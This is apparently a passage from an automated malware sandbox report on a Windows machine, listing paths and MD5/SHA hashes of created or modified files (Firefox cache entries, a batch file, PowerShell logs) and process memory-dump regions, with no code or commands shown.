SHA512 cf461ae8c49813fb46bdb0abf2a6c16041c50f5b47e850f723b9b1cd8f5837957412633cfd03c4869597b9c821490610c14eb6c4c4a500168fe8e07177e449e0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27744

MD5 3705051a39f9f776cf632a5619b766e3
SHA1 f737548023b1da5a8739a315dfd814fb2401c34d
SHA256 6ec8a607df810c249d8114d0f8e5fab6ed1152099bf7511c91c532e6faac0db1
SHA512 4b77a47f2bd71bdbd09ebe555eea1f0ba05eedffbc730b15c08f8c1eb0aa97b23dbc6740b4e4b724d26c67a84b32656bd590fae1cdfb6923a8829ffb8acd07de

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\2609

MD5 7c6e080c04fd6a5b9b9b47e9b070f72b
SHA1 3c9388d1ca8ae2c4e79cc275a169037fcec339e1
SHA256 5c2948dae772f077222a749b42b0cb4e5b56d6a1b994918a3fb6dcfe5bb0ce40
SHA512 c4e679f8787ed4553261791b28c4d0c54084ee943b9819274f28fe78ed497f84b47dd4336a900f128c0de3a9da8bed18ba6ef5c1d5f29ea242ab31930a40909c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\26401

MD5 8f647d3f45f93061b8d491b750fca6b0
SHA1 53539542c984112cd084892b3d40f26195195e70
SHA256 0f8e881d71cae91f1cd63b36bc98c2e93c578a03704500c23b68672a3db69afa
SHA512 5ceddb66547689aec83b1d2c64b2ccb469ee02ba23f8f62630d30e4fcef4c15cc5cf16d2239a7ab846d1a0b078a7fb35658aa1ecafd2f86ec625598a536e5dc4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29948

MD5 a78d9e4a9f4ad19f647e56727b82ea5f
SHA1 ce13a2451b7770aeb893b96740125c397c14f1ae
SHA256 8fcd15c3371dd13dbe32ff8e7ed6b1e8b8514a643bae7a6083096aaeae39fd74
SHA512 a3fb67757a3cedee07ab91f2d3aabd28e95d751e47f01aac06e304ee2bc232a1d0e6112a3d0157bbdd8056f8c284922d04a7f17c1064535865fc6914cb1c3a52

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b21481439888aa91009ed2cd73ce7713
SHA1 0db8477d78f0ca24ec2f56d7a61599c7a5673cb9
SHA256 7e880b9b3cd67e846fc7e156aa7aa1da6d6c84af179e877e5e73a231089df425
SHA512 3b07cfe3300b59a9cd3fcb12f9e20187cbd16b8b644d56ecc37137b1f3ad7fa388b4a2dd66bb07d288faf4ca859b8307418f2264aa27e812afbdd94064fcfe7b

memory/3888-845-0x0000000002210000-0x0000000002246000-memory.dmp

memory/3888-846-0x0000000072370000-0x0000000072B20000-memory.dmp

memory/3888-847-0x0000000000A30000-0x0000000000A40000-memory.dmp

memory/3888-848-0x0000000004D20000-0x0000000005348000-memory.dmp

memory/3888-849-0x0000000004C50000-0x0000000004C72000-memory.dmp

memory/3888-850-0x00000000053C0000-0x0000000005426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vea442zf.0cm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3888-851-0x00000000054E0000-0x0000000005546000-memory.dmp

memory/3888-861-0x0000000005650000-0x00000000059A4000-memory.dmp

memory/3888-862-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

memory/3888-863-0x0000000005B30000-0x0000000005B7C000-memory.dmp

memory/3888-866-0x0000000006C80000-0x0000000006CA2000-memory.dmp

memory/3888-865-0x0000000006000000-0x000000000601A000-memory.dmp

memory/3888-864-0x0000000006D20000-0x0000000006DB6000-memory.dmp

memory/3888-867-0x0000000007370000-0x0000000007914000-memory.dmp

memory/3888-868-0x0000000007FA0000-0x000000000861A000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24399

MD5 6014dae5996129755c5cfaffb2a1a44e
SHA1 99822a1d121c510e5d23826a8517bfc87d5f70fb
SHA256 13a710a3dd0434051affaa0d5801ae329e798f3d7754e9d864b5b2fc1c074541
SHA512 e5c0fac587614fb6574330d91929bc3e611e2a306ae5927ea06e174890033eb6af302c1483c3e0cbb230a5c3c7c22a8d1acf74b90d0b23985287c2db4d59dad6

C:\Users\Admin\AppData\Roaming\Note.txt

MD5 9e2a8359db98f60d9f34f1a03f02493e
SHA1 1a70aae1681c8c4d1f5111b0d0ab2f8fa2bd5ff5
SHA256 9781b3ce834241cce16bfb2f69b18f8032679fe614b3776f4fbcbda97bf26a82
SHA512 ecba513a5198daea5f3d15a4332096babe8b1f9be5ff35fdbb305b7ca2b46c8177a242e95220eb14a69cd99d63d4a2c4ba6858b0a371951d6c0012ad7030eea4

memory/3888-883-0x0000000072370000-0x0000000072B20000-memory.dmp

C:\Users\Admin\AppData\Roaming\15.bat

MD5 1bf971e48ba0ca904319be9147a96c33
SHA1 75078fd8b6a000b848eb3f372e5f84fb58d5b98e
SHA256 74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
SHA512 e24d8d46a962c1d659a742a1926c6628f9e88268449b36a93bba5def5390eca141903e329afd3eda70f79cc391f8391e9f15639918addc923819a3efe3dcc6d0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 0774a05ce5ee4c1af7097353c9296c62
SHA1 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256 d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

memory/5332-893-0x0000000002A90000-0x0000000002AA0000-memory.dmp

memory/5332-894-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\9015

MD5 d2039f41cf0cecfa99637b837e39a94a
SHA1 e6151f7d032ed56677ce5bfe0e99083ddae1fae2
SHA256 0e2a0a2cd0542c1ce8d52175627dc3ebef2f27a087fadc71aa0a22dacd422805
SHA512 c7dfb640b24e72ce91babe68fd017184817448be646904c4e0e747835ae24ce297c6e139981b5b8a043dcef8098a18dc022ead5f443013e03384a4caabc8162c

memory/5332-886-0x00000000714C0000-0x0000000071C70000-memory.dmp

memory/5332-895-0x0000000005E50000-0x00000000061A4000-memory.dmp

memory/5332-905-0x0000000006390000-0x00000000063DC000-memory.dmp

memory/5332-907-0x0000000006790000-0x00000000067D4000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\18634

MD5 6c7185e6c60fdee961567afec3dd2cf5
SHA1 03dd6f3cc6e2b2c2337e2f82695b91db53934bc9
SHA256 351597a37d4795b0a314f0a87c79b33658eb5a123bec71e9fc4283cb82c0dbb1
SHA512 e80df56b810651698b61099db40ba36de5bd72bb7e186495e7c30166b8fce24073bd4299d5e4768034bf8827101d5a55a743d1aa9d9772241d05edeb455ac3ca

memory/5332-914-0x0000000007710000-0x0000000007786000-memory.dmp

memory/3360-915-0x00000000714C0000-0x0000000071C70000-memory.dmp

memory/3360-916-0x0000000004DD0000-0x0000000004DE0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10825

MD5 b6bdf9587837b9e0395fd13a03dbf99e
SHA1 9411618968a4adcd0ea2c57709640d462864d35d
SHA256 905299e4ffe7a71ee90a99a4569120baf781f4e87606ef7aa369f84b8dbf1f0a
SHA512 12fa370397e7561237aa21dfdfee4413332ca1b0ca4da31bf6cf809a740348186e487398d68f4310be4231879076b789c1ed4a642e70416666b847c8ccab5053

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\25818

MD5 1ce7abd39e3a8b6a3604b7ae8ea7f7cc
SHA1 c44896432b15ba8da09c33d8db6f95ca044d6ccb
SHA256 c41894bc03def4f421467f09c646c8ad3f036ed32a4d183f63db5d0a5fddbc42
SHA512 cbaed18be0026cbbaad1634a852b37dce5fc05475ffb8ef82f12edba231159e72119164c61b04a9f7ee348dfdf7c93cc1a9a1b164b49ddcbee4d0a791cdcc139

memory/3360-951-0x00000000714C0000-0x0000000071C70000-memory.dmp

memory/5332-952-0x00000000051E0000-0x00000000051E8000-memory.dmp

memory/5332-953-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/5332-954-0x00000000077E0000-0x00000000077F8000-memory.dmp

memory/5332-988-0x0000000077DA1000-0x0000000077DA2000-memory.dmp

memory/5332-989-0x0000000007B10000-0x0000000007BA2000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15104

MD5 76a60c12c7b867e0dfcdb02447d33836
SHA1 553ce72aa26f389d42a08bd3727d21a91be37820
SHA256 b4e126d317da199871eb2f4dad80a25443ac377388f1251a69d29a83eab6d2a9
SHA512 617d2beb6a46ce5f6d0891f80c71d5fdf791def28f8ecd07f054f016d76e4e6cbbda8dd6bc23c0e31235af601a8abadaf1c73a352af43459b220523af85d212f

memory/5332-997-0x0000000002A90000-0x0000000002AA0000-memory.dmp

memory/5332-996-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

memory/5332-998-0x0000000007D40000-0x0000000007DDC000-memory.dmp

memory/5332-999-0x00000000759B0000-0x00000000759C2000-memory.dmp

memory/5332-1016-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\16342

MD5 9a6b739b533f31c52c377c62a02edf8a
SHA1 4d0801eafa1b9c1cb268ef03f7e66da1f083314a
SHA256 c07e1db4b8513bf7cf8f7744342f89c355bf4ee7d9b6e4ee959571ed21d3e3bb
SHA512 5999e81541dd4d41772e7f92f226e40699569f4d4cce1c9bf9c6d4b5c659ce6812155cbc91d5eeec6c12f5761b6f59d5cb9e26a4c3f28872ec8a3286f25b90c2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 7925b0b183afba7ca1719bf49052cc31
SHA1 5ebfdfa3b48113787419e5d67e30142f7b4e6606
SHA256 0cbb03f2e3d7c0ecf512d43bae2bcf1b802a5098a7e9c6ae93fec840d77b92c8
SHA512 53eb2c60711dce652d3f7f74bde0001de07b35d6080e8faf9cd309641dee7dbfecc027f2090c0ef42a0cc38d18faf21738ce6319b582288a44823792dbb8a89c

memory/5332-1037-0x00000000714C0000-0x0000000071C70000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15223

MD5 5d4ab2dd9f5bfa46e64acd27c4d060ef
SHA1 5dbe8c13ddce862d61ced87f133789bf2c4781b4
SHA256 e43b1ce30ba2ed7e41447d9885431667d3247f25f962ffb5dfb8df491ed81df0
SHA512 774b7ff1e5b29a6ca356e267e8c138422c7e873b2edcf7af9417da71c1f6b5c4612525fc9316df96b926171121f5a813491b98a5173a838c445d7c05f5b385df

memory/5332-1046-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\246\{0b3396f0-0dda-4673-bb20-700197f76cf6}.final

MD5 ab8b2d7f98a5e4951888381373199d4b
SHA1 6134520c4da223b01bd1d136ae68cd04a00099c5
SHA256 5137edc68e88ccbab59f66165a423aed8761f014f1a0d5a1cb6b18f5ece95d57
SHA512 647edc4c9e4f8096cd075fb4e4b30f53a810afbb1e8aaf4f876367883f933a0da8036a260796aa874a337dfc82a12a8b898a869856f6fdb2847359f8f379b3a1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\21468

MD5 21a9c6f830660b0ad30d86f9d8e674d9
SHA1 62740ad880bccfd6251f28b2be7aeb070bdc0a2e
SHA256 1bdea5b18f1da827723dbb3f01db4f165879d5ad5de00a7b284ab9932f5223ca
SHA512 d27544447a954a17fd0da2c4b02f441a9b64b95993586228b4344bfa1fb03180a017f7c8e0ef806a0ccd8227ebc551c6a59bfe26fec32837f5790b4c51fa9d59

memory/5332-1117-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\21858

MD5 c8ae83815978362c558aa50bf194ea4e
SHA1 1890ddda1e8246e6196f9c2aa3ff25ea4faa44ec
SHA256 3692a9725cfb1a1f0249269bb459206bd3f4da30648fcfa6081110321e4b0d1a
SHA512 c7996b6b139c85335f91a2f79a0ae0677625f700d8351bfee955ff83d20171d10f0ef4f6683787c622e39e7f13f2e39de875132c7470599acee185281bbecb44

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\18144

MD5 0adde93759160ada64fbf906dacbf7cf
SHA1 4f4d8ad3c4f7a7b8fd0af4850b9b7ecb68df39d0
SHA256 ece405cf1eda7e687031534c889e5204521d5f4670a6be3be0e853676926c600
SHA512 978bb114356c3b5ba135b24ec316aa5766690caa48cba3fbcb10c80c2d41aa01b82d1c8ca5e070965dc5ba35f0030a72df83f1dd66bc34511e19a861c58b4c92

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24563

MD5 093b04b6a63ad1e486340a81c96f1e67
SHA1 fa1ef9b63ea10d704fb40ad1d244bdc26f2cfc98
SHA256 f6776ce4afbbb2cfdc812b6a8ff6fadade0e18225f1fe9e82c233c25edc877d5
SHA512 4d7f309f830fb293a3ba392cc34856199786a848bb0d54b3eebaa2ecde25379ac581432ace3217e116340cb05ffff60cf957959985b7b56106c35a4e34160494

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\2984

MD5 f1ab68ff7f2f21d7203f5015e58b52a4
SHA1 90b0baa351912575f9b598058b24ab27498cf399
SHA256 94127e3af32e1fe5fe818a638b50bf4a2829e14b15d2281d655294719e5f5a69
SHA512 c87701a4584443f147a61ce8b91253bbf4e1164629364f2f82abe23e5b1aa5d34dfb68f2e332f56da5562bccfea3460b5f98ba6baa3a14b2c638f1baa5b4c1d4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\25619

MD5 a39134d6496022073b28800c05a2c7ce
SHA1 85b3e4fb344e14a0b10add302a84d12c7c605f4d
SHA256 bdc553fc32b7da307d7b7268fb12e541cb7b8a2d29b541cce3035a22ca759d0f
SHA512 c4f9328c4cdea64ab43f36ac0e1166551a35f71e81dc46192f65a87d35f222de80c91f3f31dce5c0a27020b510b69c82c68c244a2533fb0ae64b5da6a0644c56

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\18751

MD5 6e54165695d73c70ce789967314ef33c
SHA1 80b96feeae02b963b3d7443e072f2599da9c6b3f
SHA256 939b6934f1b9d8995a9acdc6983aec7134400a44eb890c8e0d2ab1425e445d41
SHA512 6df50c750f22fcfe8a94e82a2a02ff3e501d595e1eee3a3413889880fa8bc039c44cfdf10f01603613d0ab756a9a16c4a87077e183e75c240cfd0a82812ba03e

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\32579

MD5 814547976169f813a1a39fe371a81553
SHA1 cf57d1b627067b17d4330298237389e6e2f72be8
SHA256 c8b69850f49cd5e66e06ac7011c5758fd9f1f2e6493551c3521193d4f98f082d
SHA512 6d9e7fbee0be024b8ca14e511d714a8f1645abca3a88c7efad5550a650696dab2718cc4c367876b0ce24efefd5bd75da4468c9018f7ee2b45c148a1406fdcd0f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23919

MD5 86a0420d028d06ea2486d61a5c8f92c2
SHA1 c75d76b9b4181249318e8a9d9367a4a023e6fea8
SHA256 326d37919ef04fb54f03b6e61a03ffa9d037b3fa481919e4dc04d338280f96c1
SHA512 66225f6852e93155a7a86379db8a0c9657ff34c58ebd49483b2bc39f9690d611534359170c59c1a118ced60823eadc2f52db607c860e03623675fc585b9d41fb

memory/5332-1212-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15886

MD5 d1830301b98aef8e93751f0241242f0e
SHA1 a8b40d19459bd09e59e85573887c147648db904e
SHA256 5a0e0ebbb41e1dab627a7d9193ebc2748158bf5c0a17d3fb96875f8f7ee912a9
SHA512 1ba207e182b17665fe753a7973845a33464f746959b866e2a0d0d91cee71f2dc16653f36312fb4fb6761d8e727d7cb5126d6467f25e3b367a4a3f0ab00a431b9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10276

MD5 d823998bbb5ca992e4899a5d11be27af
SHA1 587cb4ec94e73ce9b88757260f8bb140963f52ea
SHA256 d3a24fb46f141ddce54a40479db1b796a80549f5263cf93aff380de4377f747b
SHA512 98b0dc7f4679677a28ed3ee4a0985706f06b1ae8c85732196d1e7eefdd0d9d20da53cf125395189b71c1ea04d84ddffa3faa3f5487b68c69433af17fad978e5b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 35cb36b94bd14249be302315a17a7330
SHA1 92b17e493a5b53d3b8c5ec69eb8e51c1bfa78cc7
SHA256 10d07c966f0ab783731ad5dcd2d69c977a726d21a77d09f76f5bed4a76ffd1e9
SHA512 d2988e6c48bffba5abfd6fe1ea95241d0816f9675bbc1b1a9bd20062ba1c4e2e46325ca487e6b7f39e8a5e0562e37852b0533950b56bc4cc7422b283fd15252a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11042

MD5 909472dde5051e12c8e87f406c8d05d3
SHA1 4806f5076b25c7f2eee13587162da2e2a8418b14
SHA256 86e2a78acbb43d2d1bbcba2ae96f3b870eae7d490883861b078c69f96a75882f
SHA512 ef1c95f2d00b2c3c9d7702ce8f625c66c8a963182cecf3bba42bbb2cbe2fff00413a93e645904b23c157f766f7db026932102673b63a77a1dfdd026c5b599a02

memory/5332-1247-0x0000000002A90000-0x0000000002AA0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\23\{36aa1642-40c9-4158-946c-811ebe41ff17}.final

MD5 99aff7473abd9a244b8089bc36722225
SHA1 24a13d72ef09437a10b629393fc7e6fa0aa5d1a1
SHA256 0203b9db7296295120bc50e69eda7c0748500112342729c890499999bc2d9abe
SHA512 1e49a6ed5aa276ddcb6a5f750c4292af813a61022e22b8fd4bffcd27c77028d658884e1e0c26d1762a99c4a43495767ca7da6048538bde8411198ca8039f45b1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\26441

MD5 cfe1e732ae504c9f1a003c8aef6ed46e
SHA1 c8f8a9a55b09e2769f2323fc2c8c571077736460
SHA256 491d3a56b6396e0f5146cd609c8c9714a6d6f07f82b7f686ca26f32005c32f9c
SHA512 7d60726733991e572ae6839d63a1d243ddc3f88f61ca76db681c30f931dcbca5ce099ef055e7e35ad043bad29c738fa23573f04fbc722f0ad5aa174a8bacfca1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\31064

MD5 ce5c81ed4102347005411e2eb87c0875
SHA1 54b427fc68b31f26e1c17f0f45852d0179795361
SHA256 9030b6b5cb4a407c066ac1138379fc2d989ea25df6600b34e446b85224fb6b0e
SHA512 03fcaf24567b545f661e5217fb936798f5bcba3b761553cf03d3b82f87f73bd209a2e0875eac30b43f1cd2465140fb135c879c7a265b0531bbc039d6dbfa28aa

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\17645

MD5 737e8f83a8959b63f22a6cd967e4718f
SHA1 124ecdbfb3142c0f6ab6e61e9d62d1b738bf4a85
SHA256 97ff0f05cb327c842822636487413fb126d3742fa370986ea34462a18d6f7451
SHA512 f0907abb10d58bfdc8df2e16a8162721afbab38c834aeef5f018ce42d8aab6c5fd3a45c5b145e11c97637636656d63b7b14ec35bdfc01e694b9b673291c16575

memory/6044-1275-0x000001785B450000-0x000001785B472000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1f574d8dbd6c087d546bd7283c1a7471
SHA1 9a8385dfdc708df0537a467850028c4030f40d6d
SHA256 d81fbbe2c59567024dda73382d1a620582b1f6310feea8f279a07cd6e75589f9
SHA512 d3d18bef7f90d4e0149a24a8ad23e0eb05b28e874efb36fe8ff3ac76248b91e58d0585593a1e444cda9554ee0c079904505ee2d87c09f277f915eb1bb25eb8db

memory/6044-1286-0x00007FFC71150000-0x00007FFC71C11000-memory.dmp

memory/6044-1287-0x000001785B480000-0x000001785B490000-memory.dmp

memory/6044-1288-0x000001785B480000-0x000001785B490000-memory.dmp

memory/6044-1289-0x000001785BAD0000-0x000001785BB14000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 3337d66209faa998d52d781d0ff2d804
SHA1 6594b85a70f998f79f43cdf1ca56137997534156
SHA256 9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA512 8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

memory/6044-1291-0x000001785BBA0000-0x000001785BC16000-memory.dmp

memory/4920-1301-0x00007FFC71150000-0x00007FFC71C11000-memory.dmp

memory/4920-1302-0x000001B9BB270000-0x000001B9BB280000-memory.dmp

memory/4920-1303-0x000001B9BB270000-0x000001B9BB280000-memory.dmp

memory/4920-1306-0x00007FFC71150000-0x00007FFC71C11000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\8727

MD5 3dbc6ee9b77eb34f19fec5ed91bce1e7
SHA1 8757ddc71f565c5c64a911981127622f239116ee
SHA256 2904264e79e80742bdd230f64435cfa7f716b83a33b133b4862db0b25fca82cf
SHA512 4aa0c0fa5a1f8a6f8c70f913403f7e3e00ed5a9ba925364a7b9305a8e91e963f58762733c1bac98834b56c74f31cf795ae4fd523ac44955a70a89e0be73a2f43

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\30251

MD5 58eb39588d349e2b0285fffc59b4331b
SHA1 cb0d1393b3bc6c75bbded39790dd992314893230
SHA256 d00a9130633f1e553da10733ca5374d83efd04a837b9ce898b0d0bdf261f9741
SHA512 34e93762959e9cfedea9b4f4ba91a56baa5d56866bc2fbf4a3a75662dc8f87fe4675a638a931e26daf2241588175edbb67bf7835b24f7e21925041114a572beb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 92f6bdf715f41def628e07e1b15607ad
SHA1 4a7f8799af398dad31cc26821fcd32149d796a3d
SHA256 5c9a4afa9d0ce82020efe3fa75bf41c9b7f1db1c2d0136a455c1924532729ac8
SHA512 1d71daed057d5bd91d68c662ee13fed076bc311b0ea4ce1a3cba3e835a717040c9aca0dd158fdffea7b8f4571f9b44bf27414952fa8de937402411c8b0e7a7f2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\21545

MD5 419c7a83dff825954f66c99b566004f3
SHA1 7c8bbf8fc8dcdd5cdc80902bd9acacc81f1493eb
SHA256 82d1e9287fa0392f7d492cfb1bb7e1131eed76fae1545dae8712222ba73e1c7b
SHA512 751ddfb6b2deebf485a8bc05e1a9145c5f8cdf05da28c0ff7cef6cfa771ba4cd6d88d61ddaebec4555673d949ec2c7344fc9980c2643a064b7ebd432acf45f76

memory/6044-1390-0x00007FFC816D0000-0x00007FFC816E9000-memory.dmp

memory/6044-1391-0x00007FFC71150000-0x00007FFC71C11000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\28203

MD5 c791a39f0a630189df70ad68270e6909
SHA1 b7f2106b0580605e1e95d993c3623f3ae39427a3
SHA256 c950cd7bab0f82728dc7b8b67deabe1bd4f8d4a63686a973955f6aff2a059e45
SHA512 e8d9556ebc01952b10ded2c5b62f6dffb0cdd513a3afe1c18fd17b4c3a4e2de6cf233e36100fbb17f9bb438862994945381aed0ed67e0ebb79a9cb027ffe78ec

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5d69365c313cd56db55590292bc81034
SHA1 6eb75182ec94d44dd262c4344b13c5f3317cbe0b
SHA256 06675eeb80b35c8358dae0fd1f87301e9584128419be74ec492cb36f85f97cdb
SHA512 c7352bf4b193f7f9382e55c6d2cc04cdbfdeb306ff9d7bab1254a6996371ba8a64f331e5be8c127d781e30be64a387dc7f01acfca776ae51b695cc40f7a3297f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\237\{b47b9242-816d-46ab-a787-1f078ccf60ed}.final

MD5 c810eda348f600451474f1f924a6c307
SHA1 d9d1965f1a21dda9c30208d029b120811e77072e
SHA256 961855f10a1bc0aed0ccb58c61e4a9f171d6536fc9cbda3999f74f8b4531d83f
SHA512 4b20c7a2dcfa973fc99b45f3111f575ace9193127b6db7101e1047ac3d36fe5ee17321e60ef81572edf1844a5ad907cebe9deaaab77cc8f979e1edd7fdb764c7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29913

MD5 4e4a4ae3acc828f3b1aa1d77d1c702bb
SHA1 c3aa834ef4783fa558b42412ec3c0ec4f6aacbe2
SHA256 890d3655a94cdc200bf2f7b68733be254c523d76a181e8e99cefcae73aaf4423
SHA512 7a9eb92b81a2c16e1e3c1a17b8858449c25da6559b94aef2f81926c77e41db07c198a69bf85754b6a110360057b2d044591507a798312c5a0a74c2314a435320

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\224\{b7a9ee31-929d-4b4d-92db-16b14360a6e0}.final

MD5 f23896495399476457c189679ea44211
SHA1 66e4825798d6d42e4d43e533929c6ca2f24dc381
SHA256 7851b2fd16095528b796495ca2ae240cbe21621041db5f4f883b95c5246b37f0
SHA512 32e2bca853f1e4bc25c3baccf5fa7f61d386ffc7999829fcd0e3c856d4cc0fd6cdcc356aa8e24201f4211a664c8baaba09036ab2c517f2cf8508ef3fc3f59ed8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\17\{8be4014a-62d8-4330-bb78-778b8d3d5911}.final

MD5 dc39bb15088b2cfffa61a730af3d6a10
SHA1 b11122d4cbd955a42b280103ec69af72a3ba9729
SHA256 c43f689d3ab62a0e193ffe0d02b3f0a3bff6fff0c429f1fc5ded8e485a4233a6
SHA512 be28bdfbf733a3fb4dce172df8185dbf7a7ecec3325869fa6046517c81c9c9c514c65bc0edbe0ce8eb25f3c8fc0afbf5d3e72e0ff53eb4f29ba0d5c3b39d47fe

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\31130

MD5 b2d2b1fae6e942a858e8820e7bc07a28
SHA1 340556b031087667a056b62d295fb1c8156db31a
SHA256 b1af872af072aaec6d409a3f89cfc73fed7d161109356f1dbfdc1e9500241fee
